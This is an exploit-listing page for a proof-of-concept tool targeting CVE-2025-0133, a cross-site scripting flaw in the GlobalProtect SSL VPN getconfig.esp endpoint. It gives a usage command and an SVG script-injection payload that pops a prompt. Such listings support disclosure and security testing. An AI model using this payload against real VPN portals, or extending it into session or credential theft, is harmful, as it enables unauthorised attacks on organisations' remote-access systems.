Exploit for CVE-2025-0133

Name: Exploit for CVE-2025-0133
Rating: 5 (169 reviews)

2025-06-17 | CVSS 6.9

## https://sploitus.com/exploit?id=F8D95F1D-BC2F-59F0-8B1F-0479211F2937
# mitsec_vpn_xss_exploit

🔓 Exploit for GlobalProtect SSL VPN endpoint `/ssl-vpn/getconfig.esp` that appends a crafted XSS payload to the URL.

## Usage

```bash
python3 exploit.py -u https://target.com
```

## Parameters

- `-u`, `--url`: Base target URL (do **not** include query params)

## Payload Preview

```html
<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>
```

## Author

- GitHub: [ynsmroztas](https://github.com/ynsmroztas)
- Twitter: [@ynsmroztas](https://twitter.com/ynsmroztas)